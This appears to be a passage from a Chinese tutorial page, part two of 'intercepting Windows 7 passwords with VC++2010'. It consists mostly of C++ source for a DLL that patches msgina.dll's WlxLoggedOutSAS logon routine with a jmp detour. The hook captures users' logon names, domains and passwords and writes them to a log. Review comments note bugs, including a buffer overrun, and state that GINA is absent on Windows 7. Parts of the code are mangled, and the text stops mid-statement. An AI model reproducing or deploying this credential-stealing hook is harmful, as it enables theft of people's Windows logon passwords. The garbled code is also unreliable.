基于VC++2010实现截获Windows 7密码(二)
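bool isWin2K()
{
    // Reports whether the host is Windows 2000 (version 5.0).
    // DllMain uses this to pick the prologue bytes saved in hooktable.OldCode,
    // because the five bytes the hook overwrites differ between Windows 2000
    // and XP/2003.
    //
    // Returns true only for major 5 / minor 0. Returns false when GetVersion
    // flags a non-NT platform (high bit set), when GetVersionEx fails, or for
    // any other version.
    DWORD winVer = GetVersion();
    if (winVer >= 0x80000000)
    {
        return false;
    }

    // Stack buffer instead of malloc: the original free()d a pointer that was
    // never assigned on the high-bit path (undefined behaviour) and also
    // ignored the GetVersionEx result.
    OSVERSIONINFO osvi;
    ZeroMemory(&osvi, sizeof(osvi));
    osvi.dwOSVersionInfoSize = sizeof(osvi);
    if (!GetVersionEx(&osvi))
    {
        return false;
    }
    return osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0;
}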
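#pragma pack(1) // byte-packed per the original; nothing visible here depends on the layout
// Bookkeeping for the WlxLoggedOutSAS detour, shared by StartHook,
// HookWlxLoggedOutSAS and UnHookWlxLoggedOutSAS. The page had fused the
// type and field names ("HMODULEhMsgina"); they are separated here.
struct HookTable {
    HMODULE         hMsgina;    // msgina.dll module handle, resolved by StartHook
    WlxLoggedOutSAS OldDDR;     // address of the original export; UnHook writes back to it
    WlxLoggedOutSAS NewADDR;    // detour routine the jmp lands on (FunNewADDR)
    unsigned char   OldCode[6]; // expected first 5 prologue bytes (+ NUL), restored by UnHook
    unsigned char   JmpCode[6]; // E9 + rel32 (+ NUL); displacement filled in by StartHook
};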
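// Global hook state. hMsgina and OldDDR are filled in at run time by StartHook;
// NewADDR is the detour (FunNewADDR, defined elsewhere in this project).
// OldCode defaults to the XP/2003 prologue; DllMain swaps in the Windows 2000
// prologue when isWin2K() is true. JmpCode is a 5-byte `jmp rel32` whose
// displacement (bytes 1..4) StartHook computes.
// Brace initialisers replace the original "\x.." string literals, which the
// page had mangled into "/x.." (20-char strings that cannot fit a 6-byte array).
HookTable hooktable = {
    0,
    0,
    &FunNewADDR,
    { 0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x00 }, // mov edi,edi ; push ebp ; mov ebp,esp
    { 0xE9, 0x00, 0x00, 0x00, 0x00, 0x00 }  // jmp rel32 ; displacement patched by StartHook
};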
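#pragma pack() // restore default packing after HookTable (stray "/*" dropped: it had no closing "*/")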
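DWORD WINAPI StartHook(LPVOID lpParameter); // defined below

BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    // DLL entry point. On DLL_PROCESS_ATTACH it spawns a thread running
    // StartHook, which patches msgina!WlxLoggedOutSAS; the work is deferred to
    // a thread presumably because DllMain runs under the loader lock.
    // Nothing is undone on DLL_PROCESS_DETACH: UnHookWlxLoggedOutSAS is never
    // called from here, so the patched prologue stays for the life of the process.
    // Always returns TRUE.
    (void)hModule;
    (void)lpReserved;

    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        // Windows 2000's WlxLoggedOutSAS starts `push ebp; mov ebp,esp; sub esp,imm8`,
        // whereas XP/2003 use the hot-patchable `mov edi,edi; push ebp; mov ebp,esp`.
        // OldCode must match the bytes actually present so UnHook restores the
        // right ones. The original wrote these as multi-char constants ('/x55').
        if (isWin2K())
        {
            hooktable.OldCode[0] = 0x55;
            hooktable.OldCode[1] = 0x8B;
            hooktable.OldCode[2] = 0xEC;
            hooktable.OldCode[3] = 0x83;
            hooktable.OldCode[4] = 0xEC;
        }

        // StartHook already has the LPTHREAD_START_ROUTINE signature; no cast needed.
        HANDLE hThread = CreateThread(NULL, 0, StartHook, NULL, 0, NULL);
        // The handle is only released, never waited on; CreateThread can return NULL.
        if (hThread != NULL)
        {
            CloseHandle(hThread);
        }
        break;
    }
    default:
        break;
    }
    return TRUE;
}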
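void HookWlxLoggedOutSAS(); // defined below

DWORD WINAPI StartHook(LPVOID lpParameter)
{
    // Thread routine started from DllMain. Resolves msgina.dll's exported
    // WlxLoggedOutSAS, computes the `jmp rel32` displacement to NewADDR and
    // installs the 5-byte detour. Always returns 0 (the exit code is never read);
    // bails out silently when msgina.dll, the export, or the expected prologue
    // is missing.
    //
    // NOTE(review): msgina.dll is the GINA of Windows 2000/XP/2003. Vista and
    // later replaced GINA with credential providers, so on those systems
    // (including the Windows 7 of the page title) GetModuleHandle returns NULL
    // here and nothing is hooked.
    (void)lpParameter;

    hooktable.hMsgina = GetModuleHandle(_T("msgina.dll"));
    if (hooktable.hMsgina == NULL)
    {
        return 0;
    }

    // GetProcAddress takes an ANSI name (LPCSTR) regardless of UNICODE; the
    // original passed _T("..."), which is a wide literal in UNICODE builds.
    hooktable.OldDDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
    if (hooktable.OldDDR == NULL)
    {
        return 0;
    }

    // Refuse to patch unless the prologue is the one OldCode expects: otherwise
    // the jmp would split an unknown instruction, and UnHook would later write
    // back bytes that were never there.
    if (memcmp((const void *)hooktable.OldDDR, hooktable.OldCode, 5) != 0)
    {
        return 0;
    }

    // jmp rel32: the displacement is relative to the end of the 5-byte instruction.
    // This is a 32-bit x86 detour; the subtraction goes through DWORD_PTR so the
    // pointers are not truncated to int before the arithmetic.
    DWORD rel = (DWORD)((DWORD_PTR)hooktable.NewADDR - (DWORD_PTR)hooktable.OldDDR - 5);
    // memcpy rather than an int* store at JmpCode[1]: that address is unaligned.
    memcpy(&hooktable.JmpCode[1], &rel, sizeof(rel));

    HookWlxLoggedOutSAS();
    return 0;
}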
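// Overwrites the first `n` bytes of code at `target` with `bytes`, temporarily
// making the page writable. Returns FALSE and leaves the code untouched when
// VirtualProtect refuses; the original ignored that return and wrote anyway,
// which faults on a page that stayed read-only. The instruction cache is
// flushed afterwards so the CPU does not keep executing the stale bytes.
static BOOL WriteCodeBytes(void *target, const unsigned char *bytes, SIZE_T n)
{
    DWORD oldProtect = 0;
    if (!VirtualProtect(target, n, PAGE_EXECUTE_READWRITE, &oldProtect))
    {
        return FALSE;
    }
    memcpy(target, bytes, n);
    // Put the previous protection back; the scratch DWORD only satisfies the API.
    DWORD scratch = 0;
    VirtualProtect(target, n, oldProtect, &scratch);
    FlushInstructionCache(GetCurrentProcess(), target, n);
    return TRUE;
}

// Installs the detour: copies the 5-byte `jmp rel32` prepared by StartHook over
// the start of WlxLoggedOutSAS. Does nothing if the page could not be made
// writable; the void signature callers rely on is unchanged.
void HookWlxLoggedOutSAS()
{
    WriteCodeBytes((void *)hooktable.OldDDR, hooktable.JmpCode, 5);
}

// Removes the detour by writing the saved prologue bytes (OldCode) back over
// the jmp. Only meaningful after the hook was installed: OldCode is the
// expected prologue, not bytes read back from memory.
void UnHookWlxLoggedOutSAS()
{
    WriteCodeBytes((void *)hooktable.OldDDR, hooktable.OldCode, 5);
}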
// Static scratch buffer used by WriteLog below. NOTE(review): WriteLog zeroes it
// with `size_u + 1024` bytes, where size_u is the combined length of the
// user, domain, password and old-password strings, so anything over 100
// characters in total overruns this 1124-byte array.
char pBuffer[1124];
void WriteLog(PWLX_MPR_NOTIFY_INFOpNprNotifyInfo)
//主要是一些文件操作
{
int size_u = lstrlenW( pNprNotifyInfo->pszUserName );
size_u += lstrlenW( pNprNotifyInfo->pszDomain );
size_u += lstrlenW( pNprNotifyInfo->pszPassword );
size_u += lstrlenW( pNprNotifyInfo->pszOldPassword );
unsigned short *pWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
unsigned short *tWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
char pBuffer1[1124];
char *pwd =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
char *pwd2 =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024*3 );
ZeroMemory( pWBuffer , size_u + 1024 );
ZeroMemory( pBuffer , size_u + 1024 );
ZeroMemory( pBuffer1 , size_u + 1024 );
if ( !pBuffer )
{
return;
}else
{
WriteCurrentTime();
wsprintfW( pWBuffer ,
L"/r/nUser= %s /r/nDomain = %s